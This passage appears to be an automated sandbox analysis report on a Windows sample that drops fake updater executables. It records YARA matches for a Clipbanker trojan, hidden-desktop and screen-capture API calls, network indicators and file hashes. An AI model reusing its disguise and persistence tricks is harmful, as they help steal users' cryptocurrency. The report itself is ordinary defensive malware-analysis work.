Source: 3b6N2Xdh3CYwplaces.sqlite.0.dr, D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org#
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: D87fZN3R3jFeplaces.sqlite.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.6:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.6:49708 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.199.220.53:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063EC230 SetThreadExecutionState,SetThreadExecutionState,CreateThread,CloseHandle,GetDesktopWindow,GetWindowRect,GetSystemMetrics,GetSystemMetrics,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,shutdown,closesocket,SetThreadDesktop,Sleep,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,GetCurrentThreadId,GetThreadDesktop,BitBlt,DeleteObject,DeleteDC,ReleaseDC,Sleep,GetSystemMetrics,GetSystemMetrics,GetCurrentThreadId,GetThreadDesktop,SwitchDesktop,SetThreadDesktop,Sleep,Sleep,DeleteObject,DeleteDC,ReleaseDC, 0_2_063EC230
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063C9080 OpenDesktopA,CreateDesktopA, 0_2_063C9080

System Summary

Source: 35.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 35.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 14.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 14.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 42.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 42.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 38.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 38.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 32.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 32.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 13.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 13.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 22.2.IQUKpYR1BFFsqw1YWBOv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 22.2.IQUKpYR1BFFsqw1YWBOv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 24.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 24.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 41.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 41.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 29.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 29.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 10.2.VkHLTH_m2kErRb6vpA5n.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 10.2.VkHLTH_m2kErRb6vpA5n.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000017.00000002.2556843085.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000017.00000002.2556843085.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000A.00000002.2495381134.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000A.00000002.2495381134.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000E.00000002.2512361549.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000E.00000002.2512361549.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000F.00000002.2512547715.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000F.00000002.2512547715.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000029.00000002.2857457109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000029.00000002.2857457109.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000020.00000002.2684473529.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000020.00000002.2684473529.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000023.00000002.2778342634.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000023.00000002.2778342634.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000026.00000002.4532446439.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000026.00000002.4532446439.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000000D.00000002.2514737568.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000D.00000002.2514737568.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000016.00000002.2545838500.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000016.00000002.2545838500.0000000000401000.00000020.00000001.01000000.00000009.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000002A.00000002.2950167796.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000002A.00000002.2950167796.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 00000018.00000002.2554981113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 00000018.00000002.2554981113.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 0000001D.00000002.2600512204.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000001D.00000002.2600512204.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: C:\Users\user\Desktop\file.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063CC480 CreateProcessAsUserA,CloseHandle,CloseHandle,WaitForSingleObject,GetExitCodeProcess, 0_2_063CC480
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004E925D 0_2_004E925D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004103C0 0_2_004103C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00496450 0_2_00496450
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040C490 0_2_0040C490
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0045A490 0_2_0045A490
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004564A0 0_2_004564A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0045B4B0 0_2_0045B4B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00458520 0_2_00458520
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0043B750 0_2_0043B750
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00438770 0_2_00438770
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0043C800 0_2_0043C800
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004378A0 0_2_004378A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00442940 0_2_00442940
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00439A80 0_2_00439A80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00434B20 0_2_00434B20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0042EB90 0_2_0042EB90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0045CC40 0_2_0045CC40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040BFC0 0_2_0040BFC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0048E040 0_2_0048E040
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007040BB 0_2_007040BB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00708167 0_2_00708167
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0044C160 0_2_0044C160
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00702158 0_2_00702158
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00490100 0_2_00490100
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00703108 0_2_00703108
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00487270 0_2_00487270
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070A227 0_2_0070A227
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070A2BD 0_2_0070A2BD
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0047F360 0_2_0047F360
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070A345 0_2_0070A345
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004E03D0 0_2_004E03D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00483470 0_2_00483470
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402410 0_2_00402410
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004944E0 0_2_004944E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00416490 0_2_00416490
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_007095CE 0_2_007095CE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004E959F 0_2_004E959F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00709583 0_2_00709583
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402600 0_2_00402600
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00472630 0_2_00472630
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00704607 0_2_00704607
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00433740 0_2_00433740
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070076C 0_2_0070076C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00470760 0_2_00470760
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0048F7B0 0_2_0048F7B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004FB84F 0_2_004FB84F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070181F 0_2_0070181F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00471830 0_2_00471830
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0070189A 0_2_0070189A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FF968 0_2_006FF968
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FF9CA 0_2_006FF9CA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004FD9FE 0_2_004FD9FE
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0041F9B0 0_2_0041F9B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FFA73 0_2_006FFA73
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00701A03 0_2_00701A03
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00481A30 0_2_00481A30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00708ABB 0_2_00708ABB
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00702A96 0_2_00702A96
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004E3B58 0_2_004E3B58
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0044EB90 0_2_0044EB90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004E5B90 0_2_004E5B90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FFC44 0_2_006FFC44
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00704C0B 0_2_00704C0B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004F6CC5 0_2_004F6CC5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_006FFC82 0_2_006FFC82
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00490E40 0_2_00490E40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0049EE70 0_2_0049EE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00418EE0 0_2_00418EE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00483EF0 0_2_00483EF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00482FE0 0_2_00482FE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00493FF0 0_2_00493FF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063ED540 0_2_063ED540
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063CA230 0_2_063CA230
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063C9A10 0_2_063C9A10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063D3B60 0_2_063D3B60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063EC990 0_2_063EC990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063E1980 0_2_063E1980
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0640E63B 0_2_0640E63B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_06421714 0_2_06421714
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063CC760 0_2_063CC760
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0641F43E 0_2_0641F43E
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063D24B0 0_2_063D24B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0640E2DC 0_2_0640E2DC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063E72F0 0_2_063E72F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063E4370 0_2_063E4370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0641C010 0_2_0641C010
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063CFE50 0_2_063CFE50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063E8F60 0_2_063E8F60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0640DF9A 0_2_0640DF9A
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_063E5AB0 0_2_063E5AB0
Source: Joe Sandbox View Dropped File: C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Source: Joe Sandbox View Dropped File: C:\ProgramData\MSIUpdaterV2_c81e728d9d4c2f636f067f89cc14862c\MSIUpdaterV2.exe F327C2B5AB1D98F0382A35CD78F694D487C74A7290F1FF7BE53F42E23021E599
Source: C:\Users\user\Desktop\file.exe Code function: String function: 06406140 appears 51 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00469F00 appears 32 times
Source: file.exe Binary or memory string: OriginalFilename vs file.exe
Source: file.exe, 00000000.00000003.2481232112.000000000613A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2533416931.00000000063A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2477379991.0000000006135000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2525199327.0000000005F6A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2528901493.00000000063AC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe, 00000000.00000003.2294659887.0000000002B90000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameDPMService.exeP vs file.exe
Source: file.exe, 00000000.00000002.4533376549.0000000000546000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameDPMService.exeP vs file.exe
Source: file.exe, 00000000.00000000.2070318774.0000000000E09000.00000008.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameDPMService.exeP vs file.exe
Source: file.exe, 00000000.00000003.2527411352.00000000063A2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamewinamp.exe0 vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameDPMService.exeP vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
Source: 35.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 35.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 23.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 14.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 14.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 42.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 42.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 38.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 38.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 32.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 32.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 13.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 13.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 22.2.IQUKpYR1BFFsqw1YWBOv.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
